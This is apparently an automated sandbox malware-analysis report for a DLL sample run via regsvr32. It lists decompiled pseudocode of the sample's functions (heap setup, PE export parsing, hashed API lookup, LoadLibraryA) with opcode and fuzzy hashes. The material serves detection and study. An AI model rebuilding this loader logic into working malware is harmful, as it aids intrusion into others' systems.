                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$AllocateObjectProcessSingleWait
                          • String ID: 8
                          • API String ID: 4287835514-406019892
                          • Opcode ID: 4921803c66df661b67f01d954ab6fee2acbef056c79a9dc11780c0e28760a7c6
                          • Instruction ID: 466944e3c4433c019a848c24e96976486b26d0f6aee746dcdaf7393f4483b6f3
                          • Opcode Fuzzy Hash: 4921803c66df661b67f01d954ab6fee2acbef056c79a9dc11780c0e28760a7c6
                          • Instruction Fuzzy Hash: 89D179736086C4CBD725CF14E488BDABBA8F788788F054129DB8957B58DB38EA45CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: HeapPrivilegeProcessRelease
                          • String ID:
                          • API String ID: 2757213858-0
                          • Opcode ID: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                          • Instruction ID: a6a064347a64b43368fcb98f917e97c2a05f7e6efa116659fde1124ceb013a52
                          • Opcode Fuzzy Hash: dc18ac2c89a23731c8803dc3dbf30e81d01cb8f7f72debe21b3699947496eca3
                          • Instruction Fuzzy Hash: 0541B272609B8586DB58CB15E4947E9B3A4F785BC8F084235DB8D47F48EF38D9A5CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C079AC0(long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a16, long long _a24) {
                          
                          				_a16 = __rbx;
                          				_a24 = __rbp;
                          				r8d =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x1a0)) + 0xb0));
                          				r8d = r8d - 0x27b3;
                          				if ( *((intOrPtr*)(__rdx + 0x158)) != r8d) goto 0x8c079b07;
                          				return 0;
                          			}



                          0x7ff88c079ac0
                          0x7ff88c079ac5
                          0x7ff88c079ae2
                          0x7ff88c079ae9
                          0x7ff88c079af3
                          0x7ff88c079b06

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID:
                          • API String ID: 1357844191-0
                          • Opcode ID: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                          • Instruction ID: 88729192d42e47d2d594e872ac0aab6d43bf0258fb41e70a577f2a1ccba451ec
                          • Opcode Fuzzy Hash: c69eeb4e4e5f15af43005440758ff9933c47d0bfbafe668ee33cbf75f2f68910
                          • Instruction Fuzzy Hash: 65116A72719B8085EB49CB66E4842AEA3A4F78DBC0F484135DF4D43B49DF39D5A18B00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 16%
                          			E003D40F8(void* __esi, void* __rcx, signed long long* __rdx, void* __r8, void* __r10, signed int _a8, long long _a16, signed int _a24, intOrPtr _a32) {
                          				signed long long _v64;
                          				long long _v72;
                          				long long _v80;
                          				long long _v88;
                          				long long _v96;
                          				signed long long** _v104;
                          				signed long long _v112;
                          				intOrPtr _v120;
                          				intOrPtr _t66;
                          				signed int _t70;
                          				signed int _t73;
                          				signed long long _t88;
                          				signed long long _t89;
                          				signed long long _t95;
                          				char* _t97;
                          				signed long long* _t100;
                          				signed long long _t101;
                          				long long _t111;
                          				long long _t112;
                          				void* _t113;
                          				signed long long** _t114;
                          				void* _t115;
                          				signed long long* _t117;
                          
                          				_a16 = __rdx;
                          				_t117 = __rdx;
                          				_t115 = __rcx;
                          				_v72 =  *((intOrPtr*)( *0x3dd458 + 8));
                          				_v80 =  *0x3dd448;
                          				_a8 =  *0x3dd450;
                          				_t73 = 0;
                          				_t88 =  *((intOrPtr*)(__rcx + 0x3c));
                          				if( *((intOrPtr*)(_t88 + __rcx + 0x88)) == 0 ||  *((intOrPtr*)(_t88 + __rcx + 0x8c)) == 0) {
                          					_t73 = 0xb;
                          				} else {
                          					_t113 = __rcx + __rcx;
                          					r8d =  *((intOrPtr*)(_t113 + 0x18));
                          					HeapAlloc(??, ??, ??); // executed
                          					_t101 = _t88;
                          					_v64 = _t88;
                          					if(_t88 == 0) {
                          						_t73 = 8;
                          					} else {
                          						_t70 = 0;
                          						r8d = 0x2010;
                          						_t95 = _t88;
                          						L003D487A();
                          						_t14 = _t101 + 0x2010; // 0x2010
                          						_t111 = _t14;
                          						 *((long long*)(_t101 + 8)) = _t111;
                          						r10d =  *((intOrPtr*)(_t113 + 0x1c));
                          						_v88 = __r10 + __rcx;
                          						_t66 =  *((intOrPtr*)(_t113 + 0x18));
                          						_a32 = _t66;
                          						if( *((intOrPtr*)(_t113 + 0x24)) != 0) {
                          							_t89 = _t88 + __rcx;
                          							_v112 = _t89;
                          							r11d =  *((intOrPtr*)(_t113 + 0x20));
                          							_t112 = _t111 + __rcx;
                          							_v96 = _t112;
                          							r8d = 0;
                          							_v120 = r8d;
                          							r9d = _a24;
                          							_t114 = _v104;
                          							while(r8d < _t66) {
                          								_t97 = _t95 + _t115;
                          								if( *_t97 != 0) {
                          									_t70 = _t70 | 0xffffffff;
                          									r9d = E003D6C1C(_t70, _t89, _t97);
                          									r9d = r9d ^ _a8;
                          									_a24 = r9d;
                          									r8d = _v120;
                          									_t112 = _v96;
                          								}
                          								_t34 = _t101 + 0x10; // 0x10
                          								_t100 = (_t89 << 5) + _t34;
                          								if(_t100[3] != 0) {
                          									do {
                          										if(r9d <= _t100[3]) {
                          											_t114 =  <  ? _t100 : _t114;
                          											_v104 = _t114;
                          										} else {
                          											_t37 =  &(_t100[1]); // 0x18
                          											_t114 = _t37;
                          											_v104 = _t114;
                          										}
                          										_t100 =  *_t114;
                          									} while (_t100 != 0);
                          									_t100 =  *((intOrPtr*)(_t101 + 8));
                          									 *_t114 = _t100;
                          									 *((long long*)(_t101 + 8)) =  *((long long*)(_t101 + 8)) + 0x20;
                          								}
                          								_t100[3] = r9d;
                          								_t95 = _t97 + _v80 + _t115;
                          								_t100[2] = _t95;
                          								_t100[1] = _t100[1] & 0x00000000;
                          								 *_t100 =  *_t100 & 0x00000000;
                          								_t112 = _t112 + 4;
                          								_v96 = _t112;
                          								_t89 = _v112 + 2;
                          								_v112 = _t89;
                          								r8d = r8d + 1;
                          								_v120 = r8d;
                          								_t66 = _a32;
                          							}
                          						}
                          						if(_t73 != 0) {
                          							HeapFree();
                          						} else {
                          							 *_t117 = _t101;
                          						}
                          					}
                          				}
                          				return _t73;
                          			}


























                          0x003d40f8
                          0x003d410b
                          0x003d410e
                          0x003d411c
                          0x003d4128
                          0x003d4133
                          0x003d413a
                          0x003d413c
                          0x003d4149
                          0x003d4307
                          0x003d415d
                          0x003d415d
                          0x003d4162
                          0x003d4177
                          0x003d417d
                          0x003d4180
                          0x003d4188
                          0x003d4300
                          0x003d418e
                          0x003d418e
                          0x003d4190
                          0x003d4196
                          0x003d4199
                          0x003d419e
                          0x003d419e
                          0x003d41a5
                          0x003d41a9
                          0x003d41b1
                          0x003d41b6
                          0x003d41bb
                          0x003d41c7
                          0x003d41d2
                          0x003d41d5
                          0x003d41da
                          0x003d41df
                          0x003d41e2
                          0x003d41e7
                          0x003d41ea
                          0x003d41ef
                          0x003d41f7
                          0x003d41fc
                          0x003d4208
                          0x003d420e
                          0x003d4210
                          0x003d4218
                          0x003d421b
                          0x003d4223
                          0x003d422b
                          0x003d4235
                          0x003d4235
                          0x003d4242
                          0x003d4242
                          0x003d424b
                          0x003d424d
                          0x003d4251
                          0x003d4262
                          0x003d4266
                          0x003d4253
                          0x003d4253
                          0x003d4253
                          0x003d4257
                          0x003d4257
                          0x003d426b
                          0x003d426f
                          0x003d4274
                          0x003d4278
                          0x003d427c
                          0x003d427c
                          0x003d4281
                          0x003d4296
                          0x003d4299
                          0x003d429d
                          0x003d42a2
                          0x003d42a6
                          0x003d42aa
                          0x003d42b4
                          0x003d42b8
                          0x003d42bd
                          0x003d42c0
                          0x003d42c5
                          0x003d42c5
                          0x003d41fc
                          0x003d42e9
                          0x003d42f8
                          0x003d42eb
                          0x003d42eb
                          0x003d42eb
                          0x003d42e9
                          0x003d4188
                          0x003d431c

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: AllocHeap
                          • String ID:
                          • API String ID: 4292702814-0
                          • Opcode ID: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction ID: 6bcb8e984c2e5af1073aff6cc5d5dddb85f866f13d66d5c95f439e2c410d87a1
                          • Opcode Fuzzy Hash: d90c455f1f88f64b94d8e0ef723daeee3f7b076c1a4ed74ada8051636fd5944d
                          • Instruction Fuzzy Hash: A7519C77A14B90C7C76ACF06F844B5AB7B4F784B94F11861AEE8943B54DB38C8A1DB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00007FF87FF88C08E7E0(void* __rcx, void* __rdx, void* __r8, void* __r9, intOrPtr _a8, intOrPtr _a24, intOrPtr _a56, intOrPtr _a64, intOrPtr _a80, intOrPtr _a120) {
                          				intOrPtr _t37;
                          				void* _t48;
                          				intOrPtr _t49;
                          
                          				_t37 = __rcx + 0x18b7;
                          				_a80 = _a80 + 0x18b7;
                          				_a120 = __r8 - 0x343a;
                          				_a24 = _t37;
                          				_a8 = __rdx - 0xefd;
                          				_a56 = __r8 + 0x61f;
                          				r13d = __r9 - 0x2598;
                          				if (_t37 - __r9 + 0xffd < 0) goto 0x8c08e91e;
                          				if (_t37 - _t48 + 0x2032 < 0) goto 0x8c08e8da;
                          				_t49 = _a64;
                          				E00007FF87FF88C07A280();
                          				 *((long long*)(_t49 + 0x158)) =  *((intOrPtr*)(_t49 + 0x358));
                          				E00007FF87FF88C07A280(); // executed
                          				 *((intOrPtr*)(_t49 + 0x78)) =  *((intOrPtr*)(_t49 + 0x78)) + ( *(_t49 + 0xc8) ^ 0x00002032);
                          				 *((long long*)(_t49 + 0xd0)) =  *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x88)) + 0x3c)) +  *((intOrPtr*)(_t49 + 0x88));
                          				return _t49 + 0x37e1;
                          			}






                          0x7ff88c08e7f5
                          0x7ff88c08e809
                          0x7ff88c08e81a
                          0x7ff88c08e82f
                          0x7ff88c08e83c
                          0x7ff88c08e849
                          0x7ff88c08e850
                          0x7ff88c08e859
                          0x7ff88c08e867
                          0x7ff88c08e869
                          0x7ff88c08e879
                          0x7ff88c08e88d
                          0x7ff88c08e894
                          0x7ff88c08e8a6
                          0x7ff88c08e8b8
                          0x7ff88c08e8d9

                          APIs
                          • UnlockFile.KERNEL32 ref: 00007FF88C08E973
                            • Part of subcall function 00007FF88C07A280: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FF88C07A2BF
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: FileHeapProcessUnlock
                          • String ID:
                          • API String ID: 4174814671-0
                          • Opcode ID: 6ee02be2cf5929f5b3194e997adc2da2210f69859bdda100d806b8d398b1bd76
                          • Instruction ID: e14f883fb0969951975e270699237707ff4c9ab16879e69153833dc11e7d2830
                          • Opcode Fuzzy Hash: 6ee02be2cf5929f5b3194e997adc2da2210f69859bdda100d806b8d398b1bd76
                          • Instruction Fuzzy Hash: FF6178736096C58BE7A1CF05E8817DEB7A4F788784F10813ACA8957B58CB38E658CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 31%
                          			E003D5FC8(void* __ecx, long long* __rax, long long __rbx, long long* __rcx, long long* __rdx, long long __rsi) {
                          				void* _t12;
                          				struct HINSTANCE__* _t13;
                          				void* _t17;
                          				void* _t25;
                          				void* _t26;
                          				long long* _t30;
                          				long long* _t32;
                          				long long _t40;
                          				long long _t49;
                          				long long* _t50;
                          				void* _t52;
                          				void* _t53;
                          				void* _t55;
                          				void* _t56;
                          
                          				_t30 = __rax;
                          				 *((long long*)(_t52 + 8)) = __rbx;
                          				 *((long long*)(_t52 + 0x10)) = _t49;
                          				 *((long long*)(_t52 + 0x20)) = __rsi;
                          				_t53 = _t52 - 0x20;
                          				_t47 =  *0x3dd458;
                          				_t32 = __rcx;
                          				_t50 = __rdx;
                          				_t13 = E003D908C(_t12, 0x2d4b080e,  *((intOrPtr*)( *0x3dd458 + 0x18)));
                          				if(_t30 != 0) {
                          					_t13 = LoadLibraryA(); // executed
                          					_t32 = _t30;
                          				}
                          				if(_t32 == 0) {
                          					E003D908C(_t13, 0xc06f8334,  *((intOrPtr*)(_t47 + 0x18)));
                          					if(_t30 == 0) {
                          						_t25 = 0x7f;
                          					} else {
                          						_t25 =  *_t30();
                          					}
                          				} else {
                          					_t17 = E003D40F8(_t26, _t32, _t53 + 0x40, _t55, _t56);
                          					_t25 = _t17;
                          					if(_t17 != 0) {
                          						E003D908C(_t17, 0xc8e2960c,  *((intOrPtr*)(_t47 + 0x18)));
                          						if(_t30 != 0) {
                          							 *_t30();
                          						}
                          					} else {
                          						_t40 =  *((intOrPtr*)(_t53 + 0x40));
                          						 *_t40 = _t32;
                          						 *_t50 = _t40;
                          					}
                          				}
                          				return _t25;
                          			}

















                          0x003d5fc8
                          0x003d5fc8
                          0x003d5fcd
                          0x003d5fd2
                          0x003d5fd8
                          0x003d5fdc
                          0x003d5fe3
                          0x003d5fe6
                          0x003d5ff2
                          0x003d5ffa
                          0x003d5fff
                          0x003d6001
                          0x003d6001
                          0x003d600b
                          0x003d6051
                          0x003d6059
                          0x003d6061
                          0x003d605b
                          0x003d605d
                          0x003d605d
                          0x003d600d
                          0x003d6015
                          0x003d601a
                          0x003d601e
                          0x003d6037
                          0x003d603f
                          0x003d6044
                          0x003d6044
                          0x003d6020
                          0x003d6020
                          0x003d6025
                          0x003d6028
                          0x003d6028
                          0x003d601e
                          0x003d607c

                          APIs
                            • Part of subcall function 003D908C: SetLastError.KERNEL32 ref: 003D90C8
                          • LoadLibraryA.KERNELBASE(?,?,00000000,003D8947,?,?,?,?,?,003D9D9C), ref: 003D5FFF
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: ErrorLastLibraryLoad
                          • String ID:
                          • API String ID: 3568775529-0
                          • Opcode ID: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                          • Instruction ID: 254a4c0452dd4bd141a7850c181b37c58798f71e91570ba1952e1c57d233310d
                          • Opcode Fuzzy Hash: 732c632c0e59d618d2429848589057d7e5eb850a61d6535023b46e3602ede8c6
                          • Instruction Fuzzy Hash: 8B117033719B41C7DF12AB92B54122A6264EBCCBC0F2D4433AF9E4B709EE39D9418320
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E00007FF87FF88C083AC0(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                          				long long _v24;
                          				void* _t18;
                          				intOrPtr _t21;
                          				intOrPtr _t23;
                          				intOrPtr _t24;
                          				void* _t32;
                          				long long _t39;
                          				signed long long _t45;
                          
                          				_t39 = __rax;
                          				_a8 = __rbx;
                          				_a16 = __rsi;
                          				_a24 = __rdi;
                          				_t32 = __ecx;
                          				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x8c083afd;
                          				_t18 = E00007FF87FF88C07E6A0(__rax);
                          				 *((intOrPtr*)(__rax)) = 9;
                          				E00007FF87FF88C07E580(_t18);
                          				goto 0x8c083b61;
                          				E00007FF87FF88C07F2B0();
                          				_t45 = __rbx;
                          				_v24 = __rbx;
                          				_t21 =  *0x8c0b4d70; // 0x40
                          				if (_t32 - _t21 < 0) goto 0x8c083b55;
                          				if ( *((intOrPtr*)(0x8c0b4970 + __rbx * 8)) == __rbx) goto 0x8c083b29;
                          				goto 0x8c083b4b; // executed
                          				E00007FF87FF88C0839D8( *((intOrPtr*)(0x8c0b4970 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
                          				 *((long long*)(0x8c0b4970 + _t45 * 8)) = _t39;
                          				if (_t39 != 0) goto 0x8c083b3c;
                          				goto 0x8c083b55;
                          				_t23 =  *0x8c0b4d70; // 0x40
                          				_t24 = _t23 + 0x40;
                          				 *0x8c0b4d70 = _t24;
                          				_v24 = _t45 + 1;
                          				goto 0x8c083b16;
                          				E00007FF87FF88C07F304();
                          				goto 0x8c083af9;
                          				return _t24;
                          			}











                          0x7ff88c083ac0
                          0x7ff88c083ac0
                          0x7ff88c083ac5
                          0x7ff88c083aca
                          0x7ff88c083ad5
                          0x7ff88c083ae6
                          0x7ff88c083ae8
                          0x7ff88c083af2
                          0x7ff88c083af4
                          0x7ff88c083afb
                          0x7ff88c083b02
                          0x7ff88c083b08
                          0x7ff88c083b0b
                          0x7ff88c083b10
                          0x7ff88c083b18
                          0x7ff88c083b25
                          0x7ff88c083b27
                          0x7ff88c083b29
                          0x7ff88c083b2e
                          0x7ff88c083b35
                          0x7ff88c083b3a
                          0x7ff88c083b3c
                          0x7ff88c083b42
                          0x7ff88c083b45
                          0x7ff88c083b4e
                          0x7ff88c083b53
                          0x7ff88c083b5a
                          0x7ff88c083b5f
                          0x7ff88c083b76

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: _invalid_parameter_noinfo
                          • String ID:
                          • API String ID: 3215553584-0
                          • Opcode ID: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                          • Instruction ID: 64220c5d8cb4d87c4a8b7a470d8eeddd0fa36d4eb45a53fd6408e3072a77103b
                          • Opcode Fuzzy Hash: e1fbc31160e4b4ac265e7fa731fe9e1eab700c2b4d0d0f1e7a082a805eaa686e
                          • Instruction Fuzzy Hash: 10115B72A1D68286FB209B62E88123976E4FB8A7C0F454435E78D4779ADF3CE901CB00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 37%
                          			E00007FF87FF88C07E26C(void* __eax, signed int __rcx, signed int __rdx) {
                          				void* __rbx;
                          				intOrPtr* _t22;
                          				signed int _t29;
                          
                          				_t29 = __rdx;
                          				if (__rcx == 0) goto 0x8c07e28b;
                          				_t1 = _t29 - 0x20; // -32
                          				_t22 = _t1;
                          				if (_t22 - __rdx < 0) goto 0x8c07e2ce;
                          				_t25 =  ==  ? _t22 : __rcx * __rdx;
                          				goto 0x8c07e2b2;
                          				if (E00007FF87FF88C081374() == 0) goto 0x8c07e2ce;
                          				if (E00007FF87FF88C080F5C(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x8c07e2ce;
                          				RtlAllocateHeap(??, ??, ??); // executed
                          				if (_t22 == 0) goto 0x8c07e29d;
                          				goto 0x8c07e2db;
                          				E00007FF87FF88C07E6A0(_t22);
                          				 *_t22 = 0xc;
                          				return 0;
                          			}






                          0x7ff88c07e26c
                          0x7ff88c07e27b
                          0x7ff88c07e27f
                          0x7ff88c07e27f
                          0x7ff88c07e289
                          0x7ff88c07e297
                          0x7ff88c07e29b
                          0x7ff88c07e2a4
                          0x7ff88c07e2b0
                          0x7ff88c07e2c1
                          0x7ff88c07e2ca
                          0x7ff88c07e2cc
                          0x7ff88c07e2ce
                          0x7ff88c07e2d3
                          0x7ff88c07e2e0

                          APIs
                          • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF88C07F1A8,?,?,000091A6AE42C18B,00007FF88C07E6A9,?,?,?,?,00007FF88C07E139,?,?,?), ref: 00007FF88C07E2C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.389521559.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000003.00000002.389503061.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389771313.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389956635.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.389983202.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390104358.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000003.00000002.390153087.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_7ff88c070000_regsvr32.jbxd
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                          • Instruction ID: 9ff59ae70b3340a9bb202d86cf04713f5274938c766684943e618b1851c99d1b
                          • Opcode Fuzzy Hash: 38d319fa34a6f28828c9c4252ccc1e606beff5a42ae1a748ed59fc70cab1af25
                          • Instruction Fuzzy Hash: 34F06264B0B20259FF6896A2D8143B512847FABBC0F185434CE1E966DEDF1DE482C120
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 92%
                          			_entry_(void* __ebx, void* __ecx, void* __esi, void* __ebp, void* __rax, void* __rcx, void* __rdx, void* __rdi, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rbx;
                          				void* _t2;
                          				void* _t8;
                          				void* _t11;
                          				void* _t18;
                          				void* _t25;
                          
                          				_t8 = 1;
                          				if(_t11 == 0) {
                          					E003D6CE4(0, __rax, _t18, __rcx, _t25);
                          					if( *0x3dd458 != 0) {
                          						HeapDestroy(); // executed
                          					}
                          				} else {
                          					if(_t11 == 1 && E003D4DB4(_t2, 1, __esi, __ebp, _t18, __rcx, __rdi, _t25, __r9, __r10, __r11) != 0) {
                          						_t8 = 0;
                          					}
                          				}
                          				return _t8;
                          			}









                          0x003d695e
                          0x003d6965
                          0x003d697d
                          0x003d698c
                          0x003d6992
                          0x003d6992
                          0x003d6967
                          0x003d6969
                          0x003d6977
                          0x003d6977
                          0x003d6969
                          0x003d699f

                          APIs
                          • HeapDestroy.KERNEL32 ref: 003D6992
                            • Part of subcall function 003D4DB4: HeapCreate.KERNEL32 ref: 003D4DE3
                            • Part of subcall function 003D4DB4: HeapAlloc.KERNEL32 ref: 003D4E3D
                            • Part of subcall function 003D4DB4: HeapDestroy.KERNEL32 ref: 003D4EA0
                          Memory Dump Source
                          • Source File: 00000003.00000002.389034131.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_3d0000_regsvr32.jbxd
                          Similarity
                          • API ID: Heap$Destroy$AllocCreate
                          • String ID:
                          • API String ID: 3351204586-0
                          • Opcode ID: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction ID: ef07ef715a398e74685ef49c1067bcb9f8be0f8205c723616dfb64ba6f96313c
                          • Opcode Fuzzy Hash: a4400d5fb00ce8b202e985b99d74023a3441fb4740ac843efecc6f335352d400
                          • Instruction Fuzzy Hash: 94E04F9271124141EF275B62B5B233913259B84744F58683B8D664A305CF38D989C210
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 55%
                          			E00007FF87FF88C07AE80(void* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r12;
                          				void* __r14;
                          				void* __r15;
                          				signed int _t158;
                          				signed int _t159;
                          				signed int _t160;
                          				intOrPtr _t177;
                          				intOrPtr _t195;
                          				signed int _t203;
                          				signed int _t212;
                          				signed int _t224;
                          				signed int _t227;
                          				void* _t234;
                          				long long _t238;
                          				signed int* _t239;
                          				long long _t242;
                          				struct _CRITICAL_SECTION* _t256;
                          				void* _t259;
                          				void* _t261;
                          				void* _t263;
                          				void* _t264;
                          				void* _t274;
                          				void* _t278;
                          				void* _t280;
                          				signed int _t281;
                          				signed int _t282;
                          				signed long long _t283;
                          				void* _t285;
                          				void* _t287;
                          
                          				_t274 = __r10;
                          				_t266 = __r8;
                          				_t241 = __rcx;
                          				_t237 = __rbx;
                          				_t234 = __rax;
                          				 *((long long*)(_t263 + 0x18)) = __rbx;
                          				_push(_t261);
                          				_push(_t259);
                          				_t264 = _t263 - 0x90;
                          				r8d =  *(_t264 + 0x120);
                          				r14d = __rdx + 0x566;
                          				_t195 = __r9 - 0x23f6;
                          				r11d =  *(_t264 + 0xf8);
                          				_t7 = _t241 - 0xde7; // 0x27ae
                          				r11d = r11d + 0x1669;
                          				 *(_t264 + 0xd0) = r14d;
                          				r10d = __r8 - 0x1137;
                          				 *((intOrPtr*)(_t264 + 0xe8)) = _t195;
                          				_t224 = __rax + 0x61f;
                          				 *(_t264 + 0x7c) = r10d;
                          				r12d = __rax - 0x1408;
                          				 *(_t264 + 0x70) = _t224;
                          				 *(_t264 + 0xd8) = r12d;
                          				 *(_t264 + 0x74) = __r8 - 0x18b7;
                          				_t177 = __r8 - 0x64c;
                          				r9d = __r8 - 0x4af;
                          				 *((intOrPtr*)(_t264 + 0x80)) = _t177;
                          				 *(_t264 + 0x118) =  *(_t264 + 0x108) + 0xffffe9cc;
                          				 *(_t264 + 0x78) = r9d;
